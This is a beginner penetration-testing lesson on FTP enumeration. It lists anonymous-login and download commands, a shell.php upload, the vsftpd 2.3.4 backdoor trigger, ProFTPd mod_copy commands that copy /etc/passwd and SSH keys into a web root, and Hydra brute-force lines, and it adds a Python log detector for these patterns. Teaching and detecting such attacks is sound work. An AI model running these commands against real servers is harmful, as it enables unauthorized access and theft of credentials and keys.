FTP Service Enumeration

Beginner | 25 min | Writeup

Finding vulnerabilities in FTP services

Learning Objectives

  • Test for anonymous FTP access
  • Enumerate FTP contents
  • Identify FTP vulnerabilities
  • Exploit misconfigured FTP servers

FTP (File Transfer Protocol) is one of the oldest protocols on the internet, dating back to 1971. Despite its age, it remains widely deployed for file transfers. The problem? FTP transmits everything in plaintext, including credentials.

FTP credentials and file contents are transmitted unencrypted. If you capture network traffic, you can read everything. Many organizations still use it internally, making it a valuable target.

Anonymous FTP

```bash
# Many FTP servers allow anonymous login
# Try these credentials:
# anonymous / anonymous
# anonymous / (blank)
# anonymous / your@email.com

# Connect with ftp client
ftp 10.10.10.10
# Username: anonymous
# Password: (press Enter or type anonymous)

# List files
ftp> ls -la
ftp> pwd

# Download everything
ftp> binary
ftp> mget *

# Upload files (if writable)
ftp> put shell.php

# Passive mode (for firewalls)
ftp> passive
```

Quick Anonymous Check

Use the nmap ftp-anon script to quickly check for anonymous FTP: nmap -sV -p21 --script=ftp-anon 10.10.10.10

FTP Enumeration

```bash
# Nmap FTP scripts
nmap -p21 --script=ftp-* 10.10.10.10

# Key scripts:
# ftp-anon: Check anonymous login
# ftp-bounce: Check FTP bounce vulnerability
# ftp-brute: Brute force credentials
# ftp-vsftpd-backdoor: Check for vsftpd 2.3.4 backdoor
# ftp-proftpd-backdoor: Check for ProFTPd backdoor

# Banner grabbing
nc -nv 10.10.10.10 21
telnet 10.10.10.10 21

# Check version for vulnerabilities
# Common vulnerable versions:
# vsftpd 2.3.4 - Backdoor (port 6200 opens)
# ProFTPd 1.3.5 - Mod_copy vulnerability
# Pure-FTPd - Various depending on version

# Download entire FTP site
wget -r ftp://anonymous@10.10.10.10/
wget -m --no-passive ftp://user:pass@10.10.10.10/
```

Known FTP Exploits

```bash
# vsftpd 2.3.4 Backdoor
# If vsftpd 2.3.4, login with username containing :)
# Opens backdoor on port 6200

# Metasploit
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.10.10.10
exploit

# Manual check
nc 10.10.10.10 21
USER test:)
PASS test
# Then connect to port 6200
nc 10.10.10.10 6200

# ProFTPd mod_copy (1.3.5)
# Copy files without authentication
nc 10.10.10.10 21
SITE CPFR /etc/passwd
SITE CPTO /var/www/html/passwd.txt

# Can copy SSH keys or webshells
SITE CPFR /home/user/.ssh/id_rsa
SITE CPTO /var/www/html/key.txt
```

The ProFTPd mod_copy vulnerability is particularly dangerous as it allows unauthenticated file copying anywhere on the filesystem!

Brute Force

```bash
# Hydra
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.10
hydra -L users.txt -P passwords.txt ftp://10.10.10.10

# Medusa
medusa -h 10.10.10.10 -u admin -P passwords.txt -M ftp

# Nmap
nmap -p21 --script=ftp-brute \
  --script-args userdb=users.txt,passdb=pass.txt 10.10.10.10

# Common default credentials:
# admin / admin
# administrator / password
# ftp / ftp
# user / user
```
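
Each technique above leaves a recognisable trace on the FTP control channel, so the same list works as a detection checklist for whoever runs the server. The Python sketch below is an added example, not part of the original writeup; the trace format, the finding names and the `max_failures` threshold are assumptions made for illustration, and the sample lines are constructed.

```python
import re
from collections import defaultdict

# Constructed sample trace (not real traffic), trimmed to the messages the rules use.
# Assumed format: "<client-ip> <C|S> <text>", C = client command, S = server reply.
SAMPLE = """\
192.0.2.10 C USER anonymous
192.0.2.10 S 230 Login successful.
192.0.2.10 C STOR shell.php
192.0.2.20 C USER test:)
192.0.2.30 C SITE CPFR /etc/passwd
192.0.2.30 C SITE CPTO /var/www/html/passwd.txt
192.0.2.40 S 530 Login incorrect.
192.0.2.40 S 530 Login incorrect.
192.0.2.40 S 530 Login incorrect.
192.0.2.50 C USER alice
192.0.2.50 S 230 Login successful.
192.0.2.50 C STOR report.pdf
"""

def detect(trace, max_failures=3):
    """Return sorted (client_ip, finding) pairs for the patterns on this page."""
    state = defaultdict(lambda: {"user": "", "authed": False, "fails": 0})
    findings = set()
    for line in trace.splitlines():
        m = re.match(r"(\S+) ([CS]) (\S+) ?(.*)", line)
        if not m:
            continue
        ip, side, verb, arg = m.groups()
        s, verb = state[ip], verb.upper()
        anon = s["user"].lower() == "anonymous"
        if side == "C" and verb == "USER":
            s["user"], s["authed"] = arg, False
            if ":)" in arg:  # vsftpd 2.3.4 backdoor trigger
                findings.add((ip, "smiley-username"))
        elif side == "C" and verb == "SITE" and not s["authed"]:
            if arg.upper().startswith(("CPFR", "CPTO")):  # mod_copy without login
                findings.add((ip, "site-copy-before-login"))
        elif side == "C" and verb == "STOR" and anon and s["authed"]:
            findings.add((ip, "anonymous-upload"))
        elif side == "S" and verb == "230":  # 230 = login accepted
            s["authed"] = True
            if anon:
                findings.add((ip, "anonymous-login"))
        elif side == "S" and verb == "530":  # 530 = login rejected
            s["fails"] += 1
            if s["fails"] >= max_failures:
                findings.add((ip, "repeated-login-failures"))
    return sorted(findings)
```

In practice the input would come from the server's command log or a control-channel capture, normalized into this line format first.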

Knowledge Check

Quick Quiz

What makes FTP particularly insecure?

Challenges

Anonymous FTP Hunt

Challenge
🌱 beginner

Connect to an FTP server and find sensitive files using anonymous access.

Key Takeaways

  • FTP transmits everything in plaintext - easy to sniff
  • Anonymous login is surprisingly common
  • vsftpd 2.3.4 has a famous backdoor (username containing :))
  • ProFTPd mod_copy allows unauthenticated file copying
  • Always check for upload capability - webshell opportunity